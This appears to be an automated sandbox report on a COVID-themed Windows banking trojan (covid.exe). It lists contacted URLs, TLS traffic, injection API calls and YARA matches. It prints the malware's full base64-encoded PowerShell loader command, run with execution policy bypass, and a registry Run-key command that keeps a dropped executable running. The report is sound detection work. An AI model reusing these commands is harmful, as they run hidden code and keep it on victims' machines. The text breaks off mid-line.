    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: base[1].js.7.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/osd.js
    Source: FL794448.htm.7.drString found in binary or memory: https://platform.twitter.com/widgets.js
    Source: base[1].js.7.drString found in binary or memory: https://redux.js.org/api/store#subscribelistener
    Source: FL794448.htm.7.drString found in binary or memory: https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5803f964fe6c9599
    Source: FL794448.htm.7.drString found in binary or memory: https://schema.org
    Source: analytics[1].js.7.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=missing_quality
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=noaudio
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=report_playback
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/answer/6276924
    Source: analytics[1].js.7.drString found in binary or memory: https://tagassistant.google.com/
    Source: base[1].js.7.drString found in binary or memory: https://viacon.corp.google.com
    Source: FL794448.htm.7.drString found in binary or memory: https://www.afro.who.int/
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google.%/ads/ga-audiences
    Source: base[1].js.7.drString found in binary or memory: https://www.googleapis.com/certificateprovisioning/v1/devicecertificates/create?key=AIzaSyB-5OLKTx2i
    Source: analytics[1].js.7.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-5QFSQRT
    Source: FL794448.htm.7.drString found in binary or memory: https://www.paho.org/hq/index.php?lang=en
    Source: powershell.exe, 00000001.00000003.262923135.000001A42AFB3000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp, FL794448.htm.7.drString found in binary or memory: https://www.who.int
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
    Source: powershell.exe, 00000001.00000002.293621546.000001A42B1B0000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/T
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/governance/world-health-assembly/seventy-third-world-health-assembly
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/what-we-do/who-brochure
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/who-we-are/privacy-policy
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ar/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/campaigns/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/campaigns/connecting-the-world-to-combat-coronavirus/how-to-report-misinformatio
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/crises/cod/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timeline
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/es/home
    Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/f
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/fr/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/home/search?indexCatalogue=genericsearchindex1&wordsMode=AnyWord&searchQuery=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ictrp/search/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/images/default-source/infographics/logo-who.tmb-1200v.jpg?Culture=en&amp;sfvrsn=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/news-room/events
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/news-room/releases
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/news/item#:ItemDefaultUrl
    Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/nt/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/pt/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/publications/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/mega-menu/data/announcement/world-health-statistics-2020
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/emergencies/democratic-republic-of-the-cong
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboard
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/redirect-pages/page/novel-coronavirus-(covid-19)-situation-dashboard
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ru/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/southeastasia
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/westernpacific/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/zh/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.youtube.com/embed/yEIPefMsf70
    Source: base[1].js.7.drString found in binary or memory: https://www.youtube.com/generate_204?cpn=
    Source: base[1].js.7.drString found in binary or memory: https://youtu.be/
    Source: base[1].js.7.drString found in binary or memory: https://youtube.com/api/drm/fps?ek=uninitialized
    Source: base[1].js.7.drString found in binary or memory: https://youtubei.googleapis.com/youtubei/
    Source: base[1].js.7.drString found in binary or memory: https://yurt.corp.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2

    E-Banking Fraud:

    barindex
    Malicious encrypted Powershell command line foundShow sources
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior

    System Summary:

    barindex
    Powershell drops PE fileShow sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\buyonegetone.exeJump to dropped file
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68604761C NtQueueApcThread,13_2_00007FF68604761C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860473EC NtResumeThread,13_2_00007FF6860473EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047494 NtAllocateVirtualMemory,13_2_00007FF686047494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686047478 NtWriteVirtualMemory,13_2_00007FF686047478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE10761C NtQueueApcThread,18_2_00007FF6FE10761C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1073EC NtResumeThread,18_2_00007FF6FE1073EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107494 NtAllocateVirtualMemory,18_2_00007FF6FE107494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE107478 NtWriteVirtualMemory,18_2_00007FF6FE107478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67478 NtWriteVirtualMemory,29_2_00007FF7E3D67478
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D67494 NtAllocateVirtualMemory,29_2_00007FF7E3D67494
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D673EC NtResumeThread,29_2_00007FF7E3D673EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D6761C NtQueueApcThread,29_2_00007FF7E3D6761C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEB110AB1_2_00007FFAEEB110AB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEB10FC21_2_00007FFAEEB10FC2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEBE28D11_2_00007FFAEEBE28D1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEBE6DE81_2_00007FFAEEBE6DE8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605CFAC13_2_00007FF68605CFAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605701913_2_00007FF686057019
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605110C13_2_00007FF68605110C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605293413_2_00007FF686052934
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860665A813_2_00007FF6860665A8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860415B013_2_00007FF6860415B0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860655F413_2_00007FF6860655F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605FE0813_2_00007FF68605FE08
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860536B413_2_00007FF6860536B4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686055ED813_2_00007FF686055ED8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605C71C13_2_00007FF68605C71C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686062B4C13_2_00007FF686062B4C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605BC0013_2_00007FF68605BC00
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686043C2013_2_00007FF686043C20
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860614EC13_2_00007FF6860614EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68604114013_2_00007FF686041140
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605D1B813_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605B1F413_2_00007FF68605B1F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF68605628413_2_00007FF686056284
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF686056AA013_2_00007FF686056AA0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE115ED818_2_00007FF6FE115ED8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11CFAC18_2_00007FF6FE11CFAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11701918_2_00007FF6FE117019
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11293418_2_00007FF6FE112934
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11110C18_2_00007FF6FE11110C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1265A818_2_00007FF6FE1265A8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1015B018_2_00007FF6FE1015B0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1255F418_2_00007FF6FE1255F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11FE0818_2_00007FF6FE11FE08
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1136B418_2_00007FF6FE1136B4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11C71C18_2_00007FF6FE11C71C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE122B4C18_2_00007FF6FE122B4C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11BC0018_2_00007FF6FE11BC00
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE103C2018_2_00007FF6FE103C20
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1214EC18_2_00007FF6FE1214EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE10114018_2_00007FF6FE101140
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11B1F418_2_00007FF6FE11B1F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11D1B818_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE116AA018_2_00007FF6FE116AA0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE11628418_2_00007FF6FE116284
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D75ED829_2_00007FF7E3D75ED8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D814EC29_2_00007FF7E3D814EC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D63C2029_2_00007FF7E3D63C20
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7BC0029_2_00007FF7E3D7BC00
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D82B4C29_2_00007FF7E3D82B4C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D76AA029_2_00007FF7E3D76AA0
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7628429_2_00007FF7E3D76284
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7B1F429_2_00007FF7E3D7B1F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7D1B829_2_00007FF7E3D7D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D6114029_2_00007FF7E3D61140
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7293429_2_00007FF7E3D72934
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7110C29_2_00007FF7E3D7110C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7701929_2_00007FF7E3D77019
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7CFAC29_2_00007FF7E3D7CFAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7C71C29_2_00007FF7E3D7C71C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D736B429_2_00007FF7E3D736B4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D7FE0829_2_00007FF7E3D7FE08
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D855F429_2_00007FF7E3D855F4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D865A829_2_00007FF7E3D865A8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3D615B029_2_00007FF7E3D615B0
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
    Source: covid.exeStatic PE information: invalid certificate
    Source: covid.exeBinary or memory string: OriginalFilename vs covid.exe
    Source: covid.exe, 00000000.00000002.302616410.0000000000C72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmpBinary or memory string: originalfilename vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs covid.exe
    Source: covid.exe, 00000000.00000002.304256413.00000000031A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs covid.exe
    Source: covid.exe, 00000000.00000002.303581212.000000000156A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs covid.exe
    Source: covid.exeBinary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@32/132@14/13
    Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.logJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:244:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6224
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5504
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1Jump to behavior
    Source: covid.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\covid.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\covid.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    <
    Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exe